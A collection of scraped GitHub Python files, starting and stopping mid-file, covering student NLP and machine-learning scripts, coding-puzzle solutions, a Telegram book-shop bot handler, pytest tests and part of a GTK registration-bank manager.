inp:\n lines = [line.rstrip('\\n') for line in inp]\n current_sentence = dict()\n for line in lines:\n if line:\n if line[0] == 'S':\n sentence_count += 1\n current_agreement = _process_current_sentence(current_sentence)\n agreement.append(current_agreement)\n current_sentence = dict()\n if line[0] == 'A':\n team_id = line[-1]\n line = line.split()\n coords = Coords(line[1], line[2].split('|||')[0])\n if current_sentence.get(team_id):\n current_sentence[team_id].add(coords)\n else:\n current_sentence[team_id] = {coords}\n agreement = [a for a in agreement if a is not None]\n annotated_sentences = len(agreement)\n print(annotated_sentences)\n avg_agreement = sum(agreement) / float(len(agreement))\n print(avg_agreement)\n","repo_name":"serge-sotnyk/prj-nlp-2019","sub_path":"students/leonid.chashnikov/03-data/2_2_inter_annotator_agreement_pairs.py","file_name":"2_2_inter_annotator_agreement_pairs.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71466085905","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import GridSearchCV, validation_curve, learning_curve, RepeatedStratifiedKFold\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\nclass KNN:\n def __init__(self, x_train, x_test, y_train, y_test):\n self.knn = KNeighborsClassifier()\n self.x_train = x_train\n self.x_test = x_test\n self.y_train = y_train\n self.y_test = y_test\n\n def evaluation_model(self, seed):\n self.knn.fit(self.x_train, self.y_train)\n param_grid = dict(n_neighbors=list(range(1, 100)))\n\n cv = RepeatedStratifiedKFold(n_splits=5, n_repeats=5, random_state=seed)\n grid = GridSearchCV(self.knn, param_grid, cv=cv, scoring=\"accuracy\", error_score=0)\n grid.fit(self.x_train, self.y_train)\n best_model: KNeighborsClassifier = self.knn.set_params(**grid.best_params_)\n\n parameter_range = np.arange(1, 30, 1)\n\n X = np.concatenate((self.x_train, self.x_test), axis=0)\n y = np.concatenate((self.y_train, self.y_test))\n\n score, train_scores, valid_scores = learning_curve(estimator=best_model,\n X=X, y=y,\n scoring='accuracy')\n\n mean_train_score = np.mean(train_scores, axis=1)\n\n mean_valuation_score = np.mean(valid_scores, axis=1)\n\n plt.title('curva di apprendimento')\n plt.plot(score, mean_train_score,\n marker='o', markersize=5,\n color='black', label='Training Accuracy')\n plt.plot(score, mean_valuation_score,\n marker='o', markersize=5,\n color='green', label='Validation Accuracy')\n plt.ylabel('Accuracy')\n plt.grid()\n plt.show()\n\n train_scores, valid_scores = validation_curve(estimator=best_model,\n X=self.x_train, y=self.y_train,\n param_name='n_neighbors',\n param_range=parameter_range,\n scoring='accuracy',\n n_jobs=-1)\n mean_train_score = np.mean(train_scores, axis=1)\n\n mean_valuation_score = np.mean(valid_scores, axis=1)\n\n plt.title('curva di validazione')\n\n plt.plot(parameter_range, mean_train_score,\n marker='o', markersize=5,\n color='black', label='Training Accuracy')\n plt.plot(parameter_range, mean_valuation_score,\n marker='o', markersize=5,\n color='green', label='Validation Accuracy')\n plt.xlabel('n neighbors')\n plt.ylabel('Accuracy')\n plt.grid()\n plt.show()\n\n best_model.fit(self.x_train, self.y_train)\n y_pred = best_model.predict(self.x_test)\n\n print(\"REPORT DEL MIGLIORE MODELLO KNN TROVATO\")\n print(classification_report(y_pred, self.y_test))\n\n\n\n\n","repo_name":"VitoNicolaLosavio/Icon-2022-23","sub_path":"Models/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73354017426","text":"from typing import List\n\n\nclass Solution:\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n l1 = len(nums1)\n l2 = len(nums2)\n i, j = 0, 0\n new_arr = []\n while i < l1 or j < l2:\n if i < l1 and j < l2 and nums1[i] < nums2[j] or i < l1 and not j < l2:\n new_arr.append(nums1[i])\n i += 1\n elif j < l2:\n new_arr.append(nums2[j])\n j += 1\n l3 = l1 + l2\n mid = l3 // 2\n if l3 % 2 != 0:\n arr = new_arr[mid: mid + 1]\n else:\n arr = new_arr[mid - 1: mid + 1]\n return sum(arr) / len(arr)\n\nc = Solution()\n\nprint(c.findMedianSortedArrays([1, 5, 15], [8, 26, 37]))","repo_name":"cetinca/study","sub_path":"algos/median_of_sorted_arrays.py","file_name":"median_of_sorted_arrays.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38645057639","text":"import re\nclass OutputParser:\n #input: the metamap output text file\n def __init__(self,input):\n self.input=input\n\n #get the umls ids from metamap output file\n def extract_umls_id(self):\n ids={}\n for line in open(self.input):\n if re.search(\"^Processing\",line):\n continue\n if re.search(\"^Meta Mapping\",line):\n continue\n id=line.split(\":\")[0].split()[-1]\n ids[id]=0\n return ids.keys()\n","repo_name":"gangcai/pymetamap","sub_path":"parse_metamap_output.py","file_name":"parse_metamap_output.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11440154152","text":"def most_common(bin_list, index):\n if [binary[i] for binary in bin_list].count('1') >= len(bin_list) / 2:\n return '1'\n else:\n return '0'\n\n\nwith open('../inputs/AoC2021-03.txt', 'r') as file:\n bin_nb_list = [line.strip() for line in file]\n\noxygen, co2 = bin_nb_list.copy(), bin_nb_list.copy()\n\ni = 0\nwhile len(oxygen) > 1 or len(co2) > 1:\n ox_rating = most_common(oxygen, i)\n co2_rating = '1' if most_common(co2, i) == '0' else '0'\n oxygen = list(filter(lambda nb: nb[i] == ox_rating, oxygen)) if len(oxygen) > 1 else oxygen\n co2 = list(filter(lambda nb: nb[i] == co2_rating, co2)) if len(co2) > 1 else co2\n i += 1\n \nprint(int(oxygen[0], 2) * int(co2[0], 2))\n","repo_name":"Patato777/AoC-2021","sub_path":"scripts/AoC2021-03_2.py","file_name":"AoC2021-03_2.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12743884168","text":"def measure_min_distance(p1, p2):\n return abs(p1[0] - p2[0]) + abs(p1[1] - p2[1])\n\n\ndef convert2pair(num_list, w):\n result = []\n for nums in num_list:\n temp = [(num // w, num % w) for num in nums]\n flag = True\n for i in range(len(temp)):\n if not flag:\n break\n for j in range(i + 1, len(temp)):\n m = measure_min_distance(temp[i], temp[j])\n if m <= 2:\n flag = False\n break\n if flag:\n result.append(temp)\n return result\n\n\nimport queue\n\n\ndef get_distance(square_list, h, w):\n long_distance = h * w\n matrix = [[long_distance for _ in range(w)] for _ in range(h)]\n is_visited = [[False for _ in range(w)] for _ in range(h)]\n q = queue.Queue()\n max_len = 0\n for x, y in square_list:\n matrix[x][y] = 0\n is_visited[x][y] = True\n q.put((x, y))\n\n while not q.empty():\n cx, cy = q.get()\n for i, j in zip([1, -1, 0, 0], [0, 0, 1, -1]):\n nx, ny = cx + i, cy + j\n if 0 <= ny < w and 0 <= nx < h:\n if matrix[nx][ny] > (matrix[cx][cy] + 1):\n matrix[nx][ny] = matrix[cx][cy] + 1\n max_len = max(max_len, matrix[nx][ny])\n q.put((nx, ny))\n return max_len\n\n\ndef combine(k, h, w):\n if h*w <= k:\n return 0\n\n result = []\n n = h * w\n min_distance = 99\n\n def helper(exist_list, rest, rest_k):\n if len(rest) < rest_k:\n return\n if len(exist_list) == k:\n result.append(exist_list)\n return\n i = 0\n while i < len(rest):\n next_exist_list = exist_list[:]\n next_exist_list.append(rest[i])\n helper(next_exist_list, rest[i + 1:], rest_k - 1)\n i += 1\n\n helper([], list(range(n)), k)\n result = convert2pair(result, w)\n if not result:\n return 1\n\n for points in result:\n distance = get_distance(points, h, w)\n if min_distance > distance:\n min_distance = min(min_distance, distance)\n\n print(points, min_distance)\n if min_distance == 1:\n return 1\n\n print(min_distance)\n return min_distance\n\n\n\nif __name__ == '__main__':\n print(combine(2, 1, 3))\n\n\n\n\n\n","repo_name":"hlcr/Leetcode","sub_path":"design_square.py","file_name":"design_square.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73091749264","text":"from aiogram import F, Router\nfrom aiogram.fsm.context import FSMContext\nfrom aiogram.fsm.state import State, StatesGroup\nfrom aiogram.types import Message\nfrom data_base.buy_books_bd_for_books import add_new_book\nfrom keyboards.keyboard_for_admin import keyboard_for_admin\nfrom keyboards.buy_books_keyboard import stop_fsm\nfrom config import admins_ids\n\n\nrouter = Router()\n\n''' Добавление новой книги '''\n\n\nclass FSMAdmin(StatesGroup):\n photo = State()\n name = State()\n author = State()\n description = State()\n price = State()\n\n\n@router.message(F.text == 'Stop 🛑')\nasync def process_gender_press(message: Message, state: FSMContext):\n await message.answer('Заполние прекращено', reply_markup=keyboard_for_admin)\n await state.clear()\n\n\n@router.message(F.text == 'Добавить книгу ✅')\nasync def add_book(message: Message, state: FSMContext):\n if message.from_user.id in admins_ids:\n await state.set_state(FSMAdmin.name)\n await message.answer(text=\"Загрузите название:\", reply_markup=stop_fsm())\n\n\n@router.message(FSMAdmin.name)\nasync def add_name(message: Message, state: FSMContext):\n await state.update_data(name=message.text)\n await state.set_state(FSMAdmin.author)\n await message.answer('Введите автора книги:')\n\n\n@router.message(FSMAdmin.author)\nasync def add_author(message: Message, state: FSMContext):\n await state.update_data(author=message.text)\n await state.set_state(FSMAdmin.description)\n await message.answer('Введите описание книги:')\n\n\n@router.message(FSMAdmin.description)\nasync def add_description(message: Message, state: FSMContext):\n if len(message.text) < 15:\n await message.answer('Описание книги ��олжно быть информативным')\n else:\n await state.update_data(description=message.text)\n await state.set_state(FSMAdmin.price)\n await message.answer('Введите цену книги:')\n\n\n@router.message(FSMAdmin.price)\nasync def add_description(message: Message, state: FSMContext):\n if message.text.isdigit():\n await state.update_data(price=message.text)\n await state.set_state(FSMAdmin.photo)\n await message.answer('Загрузите фото:')\n else:\n await message.answer('Введите цену книги:')\n\n\n@router.message(FSMAdmin.photo, F.photo)\nasync def add_photo(message: Message, state: FSMContext):\n photo = message.photo[-1].file_id\n data = await state.get_data()\n await state.clear()\n book = {}\n\n for key, value in data.items():\n book[key] = value\n await message.answer_photo(photo=photo, caption=f'Название: {book[\"name\"].capitalize()}\\n'\n f'Автор: {book[\"author\"].title()}\\n'\n f'Описание: {book[\"description\"].capitalize()}\\n'\n f'Цена: {book[\"price\"]}', reply_markup=keyboard_for_admin,\n parse_mode='html')\n add_new_book(name=book['name'],\n author=book['author'],\n description=book['description'],\n price=book['price'],\n photo=photo)\n\n\n@router.message(FSMAdmin.photo, ~F.photo)\nasync def add_photo(message: Message, state: FSMContext):\n await message.answer('Загрузите фото:')\n","repo_name":"denis313/Bot_for_buy_book","sub_path":"handlers/admin/admin_add_book.py","file_name":"admin_add_book.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30288231015","text":"import dataclasses as dc\nfrom typing import List, Any, Dict\nimport sys\nimport pytest\nimport yaml\n\nfrom app import thread_function_executions\nfrom tests.thread_function_executions_resources import app as test_resources\n\n\nTEST_RESOURCES_DIR = __file__.replace('app.py', 'test_resources')\n\n\n@dc.dataclass\nclass Tests:\n test_description: str = None\n case_descriptions: List[str] | str = None\n cases: List[Any] | Any = None\n expected_results: List[Any] | Any = None\n expectedfields: List[bool] | bool = None\n\n\ndef test_get_test_function_name() -> None:\n tests = '''\n test_description: Should return the name of the callable that the function \n (the function to test) is executed in.\n case_descriptions: function doesn't take in arguments\n cases:\n - data: null\n - data: null\n - data: null\n expected_results:\n - test_get_test_function_name\n - test_get_test_function_name\n - test_get_test_function_name\n '''\n # Load test cases into dataclass\n tests = yaml.safe_load(tests)\n tests = Tests(**tests)\n\n for i in range(len(tests.cases)):\n # Setup\n _case = tests.cases[i]\n\n # Execute function\n result = app.get_test_function_name(data=_case)\n \n # Result should be the name of this test function\n assert result == tests.expected_results[i]\n\n\ndef test_get_function_name_from_test_function_name() -> None:\n tests = '''\n test_description: Should return the name of the callable that the function \n (the function to test) is executed in.\n case_descriptions: \n - test function name with a prefix\n - test function name with a prefix\n - test function name with a suffix\n - test function name with a suffix\n cases:\n - prefix: 'prefix_0_'\n test_function_name: prefix_0_test_function_name\n - prefix: 'prefix_1_'\n test_function_name: prefix_1_test_function_name\n - suffix: '_suffix_0'\n test_function_name: test_function_name_suffix_0\n - suffix: '_suffix_1'\n test_function_name: test_function_name_suffix_1\n expected_results:\n - test_function_name\n - test_function_name\n - test_function_name\n - test_function_name\n '''\n # Load test cases into dataclass\n tests = yaml.safe_load(tests)\n tests = Tests(**tests)\n\n # Get function to test\n data = app.Data(\n test_function_name=app.get_test_function_name(), \n _module=app, \n )\n function = app.main(data=data)\n\n for i in range(len(tests.cases)):\n # Setup\n _case = tests.cases[i]\n\n # Execute function\n result = function(**_case)\n \n # Result should remove the suffix of prefix from the test function name\n # to get the name of the function being tested\n assert result == tests.expected_results[i]\n\n\ndef test_get_function_from_module() -> None:\n tests = '''\n test_description: Should return a function from a module\n case_descriptions: \n - add function in test_resources.app\n - subtract function in test_resources.app\n cases:\n - _module: {test_resources}\n function_name: add\n - _module: {test_resources}\n function_name: subtract\n expected_results:\n - add\n - subtract\n '''\n # Load test cases into dataclass\n tests = yaml.safe_load(tests)\n tests = Tests(**tests)\n\n # Get function to test\n data = app.Data(\n test_function_name=app.get_test_function_name(), \n _module=app, \n )\n function = app.main(data=data)\n\n for i in range(len(tests.cases)):\n # Setup\n _case = tests.cases[i]\n _case['_module'] = test_resources\n\n # Execute function\n result = function(**_case)\n \n # Result should be a function with the correct name\n assert type(result).__name__ == 'function'\n assert result.__name__ == tests.expected_results[i]\n\n\ndef test_setup_main_data() -> None:\n tests = '''\n test_description: Should return the name of the callable that the function \n (the function to test) is executed in.\n case_descriptions: \n - a empty dictionary\n - a dictionary\n - a empty dataclass\n - a dataclass\n cases:\n - {}\n - test_function_name: test_function_name\n _module: _module\n prefix: prefix\n suffix: suffix\n function_name: function_name\n function: function\n - {}\n - test_function_name: test_function_name\n _module: _module\n prefix: prefix\n suffix: suffix\n function_name: function_name\n function: function\n expected_results:\n - test_function_name: null\n _module: null\n prefix: test_\n suffix: _test\n function_name: null\n function: null\n - test_function_name: test_function_name\n _module: _module\n prefix: prefix\n suffix: suffix\n function_name: function_name\n function: function\n - test_function_name: null\n _module: null\n prefix: test_\n suffix: _test\n function_name: null\n function: null\n - test_function_name: test_function_name\n _module: _module\n prefix: prefix\n suffix: suffix\n function_name: function_name\n function: function\n '''\n # Load test cases into dataclass\n tests = yaml.safe_load(tests)\n tests = Tests(**tests)\n\n # Get function to test\n data = app.Data(\n test_function_name=app.get_test_function_name(), \n _module=app, \n )\n function = app.main(data=data)\n\n for i in range(len(tests.cases)):\n # Setup\n _case = tests.cases[i]\n # Convert the third and fourth cases to dataclasses before processing\n if i in [2, 3]:\n _case = app.Data(**_case)\n print(_case)\n \n\n # Execute function\n result = function(data=_case)\n \n # Result should be of type `Data` and have the expected values\n assert type(result).__name__ == 'Data'\n for field, expected_value in tests.expected_results[i].items():\n result_value = getattr(result, field)\n assert result_value == expected_value\n\n\nif __name__ == '__main__':\n # Invoke pytest for this module\n pytest_arguments = sys.argv\n pytest_arguments.extend(['-x', '-s', '--vv', '--cov', '.'])\n pytest.main()","repo_name":"fjemi/mono_repo","sub_path":"tests/tests/get_module_function_test.py","file_name":"get_module_function_test.py","file_ext":"py","file_size_in_byte":5954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17378019861","text":"import os\n\nblank = {}\n\nwith open('config.yaml', 'r', encoding='utf-8') as f:\n blank = dict(map(str.split, f.readlines()))\n\nproject_dir = blank.pop('base')\nos.makedirs(project_dir, exist_ok=True)\nos.chdir(project_dir)\n\nfor folder, files in blank.items():\n os.makedirs(folder, exist_ok=True)\n for file in files.split(','):\n with open(folder+'/'+file,'w') as f:\n print('файл создан')\n\nprint(blank)\n","repo_name":"Sikonay/GB_lesson","sub_path":"7_lesson/7_2.py","file_name":"7_2.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9711076096","text":"# By submitting this assignment, I agree to the following:\r\n# \"Aggies do not lie, cheat, or steal, or tolerate those who do.\"\r\n# \"I have not given or received any unauthorized aid on this assignment.\"\r\n#\r\n# Name: Daniel Mireles\r\n# Section: 102-540\r\n# Assignment: Lab3b_Act4_Prog2\r\n# Date: 09/12/2019\r\n\r\n#This program takes the points observed by the user and\r\n#calculates the angle, in degrees, between those two points\r\nfrom math import *\r\n#input point of observer\r\nx0 = float(input(\"Enter initial x coordinate: \"))\r\ny0 = float(input(\"Enter initial y coordinate: \"))\r\nz0 = float(input(\"Enter initial z coordinate: \"))\r\nx0 = float(x0)\r\ny0 = float(y0)\r\nz0 = float(z0)\r\n\r\n#input first point observed \r\n\r\nx1 = float(input(\"Enter first observed x value: \"))\r\ny1 = float(input(\"Enter first observed y value: \"))\r\nz1 = float(input(\"Enter first observed z value: \"))\r\nx1 = float(x1)\r\ny1 = float(y1)\r\nz1 = float(z1)\r\n\r\n# input second point observed\r\n\r\nx2 = float(input(\"Enter second observed x value: \"))\r\ny2 = float(input(\"Enter second observed y value: \"))\r\nz2 = float(input(\"Enter second observed z value: \"))\r\nx2 = float(x2)\r\ny2 = float(y2)\r\nz2 = float(z2)\r\n\r\n#assigning vectors\r\n\r\nvec1= (x1-x0,y1-y0,z1-z0)\r\nvec2= (x2-x0,y2-y0,z2-z0)\r\n\r\n#dot product of vectors \r\n\r\ntop = sum([vec1[i]*vec2[i] for i in range(3)])\r\n\r\nbottom = math.sqrt(sum([vec1[i]*vec1[i] for i in range(3)])) * math.sqrt(sum([vec2[i]*vec2[i] for i in range(3)]))\r\n\r\nangle=(math.degrees(math.acos(top/bottom)))\r\nDecimal =\"%6.2f\" % angle\r\nprint()\r\nprint(\"The angle between the points is:\",Decimal, \"degrees\")","repo_name":"DannyMireles/Python","sub_path":"Lab3b_Act4_Prog2.py","file_name":"Lab3b_Act4_Prog2.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31010439525","text":"__all__ = [\n \"CreateBankTab\"\n]\n\n# Import global modules\nimport os\nimport os.path\nimport glob\nimport gtk.gdk\nimport gobject\n\nimport kiwi.ui.dialogs\nfrom kiwi.ui.objectlist import ObjectList\nfrom kiwi.ui.objectlist import Column\nfrom kiwi.ui.widgets.combo import ProxyComboBox\n\n\n# Import application modules\nimport appexceptions\nimport regfile\nimport mainwindow\nimport batchdialog\nimport const\nimport main\nimport easydraganddrop\nimport regbank\nimport util\n\n# Class definition\nclass CreateBankTab(gobject.GObject):\n '''\n This delegate class coordinates the assembly of bank files.\n\n Emited signals:\n ---------------\n\n *reglist-updated*: Emited after the list of available registrations\n has changed. (Without renames)\n\n *keyboard-model-changed*: Emited after a change of the selected keyboard\n model (for a new bank) has been successfuly processed.\n\n *newlist-updated*: Emited after the export list has changed. (Without\n renames)\n '''\n\n # Object creation..........................................................\n\n def __init__(self, wndMain):\n '''\n Constructor. Takes a MainWindow instance as parameter because as\n coordinating controller class access to the UI is needed.\n '''\n # Initialize attributes\n self.main = main.Main.getInstance()\n self.wndMain = wndMain\n\n # Define signals\n gobject.GObject.__init__(self)\n\n gobject.signal_new(\n \"reglist-updated\",\n CreateBankTab,\n gobject.SIGNAL_RUN_LAST,\n gobject.TYPE_NONE,\n (),\n )\n\n gobject.signal_new(\n \"keyboard-model-changed\",\n CreateBankTab,\n gobject.SIGNAL_RUN_LAST,\n gobject.TYPE_NONE,\n (),\n )\n\n gobject.signal_new(\n \"newlist-updated\",\n CreateBankTab,\n gobject.SIGNAL_RUN_LAST,\n gobject.TYPE_NONE,\n (),\n )\n\n gobject.signal_new(\n \"filter-updated\",\n CreateBankTab,\n gobject.SIGNAL_RUN_LAST,\n gobject.TYPE_NONE,\n (),\n )\n\n # Insert ObjectLists into the main window\n self.oblAvailableRegs = ObjectList(\n [\n Column(\"name\", title=_(\"Registration Name\"), order=gtk.SORT_ASCENDING, searchable=True, editable=True, expand=True),\n Column(\"keyName\", title=_(\"Keyboard\"), order=gtk.SORT_ASCENDING),\n ],\n sortable = True\n )\n\n self.oblNewBank = ObjectList(\n [\n Column(\"name\", title=_(\"Registration Name\"), order=-1, searchable=True, editable=True, expand=True),\n ]\n )\n\n self.wndMain.evtAvailableRegs.add(self.oblAvailableRegs)\n self.wndMain.evtNewBank.add(self.oblNewBank)\n\n self.oblAvailableRegs.show()\n self.oblNewBank.show()\n\n try:\n self.oblAvailableRegs.enable_dnd()\n self.oblNewBank.enable_dnd()\n except AttributeError:\n # Work around mising DnD-support in older kiwi versions\n pass\n\n # NOTE: Don't set the TreeView reorderable except you're in for some\n # nasty exceptions if someone really tries to reorder the tree.\n ## self.oblNewBank.get_treeview().set_reorderable(True)\n\n self.oblAvailableRegs.connect(\"cell-edited\", self.on_oblAvailableRegs_cell_edited)\n self.oblNewBank.connect(\"cell-edited\", self.on_oblNewBank_cell_edited)\n self.oblNewBank.connect(\"has-rows\", self.onNewBankEmptyChanged)\n\n # Insert combobox for selecting display filter of registrations\n self.cbxNewBankAvailFilter = ProxyComboBox()\n self.wndMain.evtNewBankAvailFilter.add(self.cbxNewBankAvailFilter)\n self.cbxNewBankAvailFilter.show()\n\n # Insert combobox for selecting keyboard model of new bank files\n self.cbxNewBankKeyModel = ProxyComboBox()\n self.wndMain.evtNewBankKeyModel.add(self.cbxNewBankKeyModel)\n self.cbxNewBankKeyModel.show()\n\n # Connect to drag and drop signals\n # NOTE: Source is always the encapsulated TreeView but destination\n # is the ObjectList which holds the TreeView!\n self.dndAvailableRegs = easydraganddrop.EasyDragAndDrop(\n srcWidget = self.oblNewBank.get_treeview(),\n dstWidget = self.oblAvailableRegs,\n checkFunc = lambda row: True,\n actionFunc = lambda src, dst, row: self.removeColumn(\n src = src,\n dst = dst,\n row = row\n ),\n dataFunc = lambda: self.getDataNewBank()\n )\n\n self.dndNewBank = easydraganddrop.EasyDragAndDrop(\n srcWidget = self.oblAvailableRegs.get_treeview(),\n dstWidget = self.oblNewBank,\n checkFunc = lambda row: self.checkCopyRegToNewBank(row),\n actionFunc = lambda src, dst, row: self.copyColumn(\n src = src,\n dst = dst,\n row = row\n ),\n dataFunc = lambda: self.getDataAvailableRegs()\n )\n\n # Initialize and kickstart filter\n self.allRegs = []\n self.prevFilter = const.FILTER_UNDEFINED\n\n self.connect(\"reglist-updated\", self.filterToAvailableList)\n self.connect(\"keyboard-model-changed\", self.filterToAvailableList)\n self.cbxNewBankAvailFilter.connect(\"content-changed\", self.filterToAvailableList)\n\n # Connect to main.work_dir_changed signal\n self.main.connect(\"work-dir-changed\", self.on_main__work_dir_changed)\n\n # Pre-fill filter combobx\n self.cbxNewBankAvailFilter.clear()\n self.cbxNewBankAvailFilter.append_item(_(\"Show All\"), const.FILTER_NONE)\n self.cbxNewBankAvailFilter.append_item(_(\"Compatible Only\"), const.FILTER_COMPATIBLE)\n self.cbxNewBankAvailFilter.append_item(_(\"Selected Model\"), const.FILTER_MODEL)\n\n self.cbxNewBankAvailFilter.select(const.FILTER_NONE)\n self.cbxNewBankAvailFilter.update(const.FILTER_NONE)\n\n # Pre-fill keyboard model combobox\n self.cbxNewBankKeyModel.clear()\n self.cbxNewBankKeyModel.append_item(const.keyboardNameLong[const.UNKNOWN_MODEL], const.UNKNOWN_MODEL)\n\n try:\n models = []\n classes = regbank.bankfile.BankFile.getAllSubclasses()\n\n for cls in classes:\n for model in cls.keyboardNames:\n if not model in models:\n models.append(model)\n\n models.sort()\n\n for model in models:\n if model == const.ALL_MODELS \\\n or model == const.UNKNOWN_MODEL:\n continue\n\n label = const.keyboardNameLong[model]\n self.cbxNewBankKeyModel.append_item(label, model)\n except appexceptions.NoClassFound:\n pass\n\n self.cbxNewBankKeyModel.select(const.UNKNOWN_MODEL)\n self.cbxNewBankKeyModel.update(const.UNKNOWN_MODEL)\n\n self.allowedKeyboardNames = []\n\n # Connect to content-changed of keyboard model combobox\n # NOTE: This must be done after the widget has been filled with data\n # for the first time. Otherwise the event would be triggered with\n # each new entry and raise a TypeError exception for the first entry.\n self.cbxNewBankKeyModel.connect(\"content-changed\", self.onKeyboardModelChanged)\n\n # Add images to buttons\n img = gtk.Image()\n img.set_from_stock(gtk.STOCK_GO_FORWARD, gtk.ICON_SIZE_BUTTON)\n self.wndMain.btnAddSelected.set_property(\"image_position\", gtk.POS_TOP)\n self.wndMain.btnAddSelected.set_image(img)\n\n img = gtk.Image()\n img.set_from_stock(gtk.STOCK_GO_BACK, gtk.ICON_SIZE_BUTTON)\n self.wndMain.btnRemoveSelected.set_property(\"image_position\", gtk.POS_TOP)\n self.wndMain.btnRemoveSelected.set_image(img)\n\n img = gtk.Image()\n img.set_from_stock(gtk.STOCK_EXECUTE, gtk.ICON_SIZE_BUTTON)\n self.wndMain.btnBatch.set_property(\"image_position\", gtk.POS_TOP)\n self.wndMain.btnBatch.set_image(img)\n\n img = gtk.Image()\n img.set_from_stock(gtk.STOCK_CLEAR, gtk.ICON_SIZE_BUTTON)\n self.wndMain.btnClearList.set_property(\"image_position\", gtk.POS_TOP)\n self.wndMain.btnClearList.set_image(img)\n\n img = gtk.Image()\n img.set_from_stock(gtk.STOCK_SAVE_AS, gtk.ICON_SIZE_BUTTON)\n self.wndMain.btnSaveBank.set_property(\"image_position\", gtk.POS_TOP)\n self.wndMain.btnSaveBank.set_image(img)\n\n # Events for checking allowed buttons\n self.connect(\"reglist-updated\", self.checkAllowedButtons)\n self.connect(\"newlist-updated\", self.checkAllowedButtons)\n self.connect(\"filter-updated\", self.checkAllowedButtons)\n self.connect(\"keyboard-model-changed\", self.checkAllowedButtons)\n self.cbxNewBankKeyModel.connect(\"content-changed\", self.checkAllowedButtons)\n\n\n # Work directory access ...................................................\n\n def on_main__work_dir_changed(self, obj, workDir):\n '''\n Event handler for changed working directory. Updates the list of\n available registrations.\n '''\n # Remove all items from list\n self.allRegs = []\n\n # Retrieve list of available files\n pattern = os.path.join(workDir, \"*.%s\" % (regfile.extension))\n filenames = glob.glob(pattern)\n\n # Append empty registration entry to list\n entry = mainwindow.AvailableRegsEntry(\n name = const.REG_NAME_EMPTY,\n keyName = const.keyboardNameLong[const.ALL_MODELS],\n model = const.ALL_MODELS,\n fileName = \"\"\n )\n\n self.allRegs.append(entry)\n\n # Read files and append to list\n for filename in filenames:\n # Skip bad files\n if not regfile.regfile.RegFile.canUnderstandFile(filename=filename):\n continue\n\n # Read registration data and populate list\n regFile = regfile.regfile.RegFile(filename=filename)\n\n entry = mainwindow.AvailableRegsEntry(\n name = regFile.getRegistrationObject().getName(),\n keyName = const.keyboardNameLong[regFile.getKeyboardName()],\n model = regFile.getKeyboardName(),\n fileName = filename\n )\n\n self.allRegs.append(entry)\n\n # Make sure that values get filtered to display\n self.prevFilter = const.FILTER_UNDEFINED\n\n # Emit reglist-updated signal\n self.emit(\"reglist-updated\")\n\n\n def availableRegRename(self, regEntry):\n '''\n Delegate method called by UI. Responds to a renamed available\n registration by changing the registration file's content and name.\n '''\n # Don't process dummy registrtions (### EMPTY ###)\n if not regEntry.fileName:\n regEntry.name = const.REG_NAME_EMPTY\n return\n\n # Access registration binary data\n regFile = regfile.regfile.RegFile(filename=regEntry.fileName)\n regObj = regFile.getRegistrationObject()\n\n # Abort if name didn't change\n if regEntry.name == regObj.getName():\n return\n\n # Store changed name into binary data\n oldName = regObj.getName()\n regObj.setName(regEntry.name)\n\n # Save registration file with new file name (but keep old file)\n oldFileName = regEntry.fileName\n newFileName = util.calculateFileNameFromRegName(regEntry.name, self.main.workDir)\n regFile.storeRegFile(newFileName)\n\n # Change entry of available registration list in-place (no list reload)\n regEntry.fileName = newFileName\n\n # Scan list of new bank file and replace old filename if found\n for newReg in self.oblNewBank:\n # Skip dummy registrations\n if not newReg.fileName:\n continue\n\n # Skip files whose file name doesn't match anyway\n if not os.path.samefile(newReg.fileName, oldFileName):\n continue\n\n # Change file name\n newReg.fileName = newFileName\n\n # Change name if it matches old name\n if newReg.name == oldName:\n newReg.name = regEntry.name\n\n # Update displayed list\n self.oblNewBank.update(newReg)\n\n # Delete old file with old name\n if not os.path.samefile(oldFileName, newFileName):\n os.unlink(oldFileName)\n\n # Emit reglist-updated signal\n self.emit(\"reglist-updated\")\n\n\n # List of available registrations .........................................\n\n def doBatch(self):\n '''\n Delegate method called by the UI. Gets called when the user activates\n the \"Batch\" button. Uses a BatchDialog object in order to show a\n modal dialog which performs the processing.\n '''\n # Make sure a valid keyboard model was selected\n keyboardName = self.getNewBankKeyboardName()\n\n if keyboardName == const.ALL_MODELS \\\n or keyboardName == const.UNKNOWN_MODEL:\n self.wndMain.setStatusMessage(const.msg[\"invalid-key-name\"])\n return\n\n # Collect registrations for the dialog\n regEntryList = []\n\n for entry in self.oblAvailableRegs:\n if not entry.fileName:\n continue\n\n if not entry.model in self.allowedKeyboardNames:\n continue\n\n regEntryList.append(entry)\n\n batchDialog = batchdialog.BatchDialog(keyboardName, regEntryList)\n\n try:\n amountFiles = batchDialog.show()\n\n # Display status message\n self.wndMain.setStatusMessage(const.msg[\"n-banks-created\"] % (amountFiles))\n except appexceptions.Cancel:\n pass\n\n batchDialog.destroy()\n\n\n def filterToAvailableList(self, *data):\n '''\n Event handler method which fills the available registrations 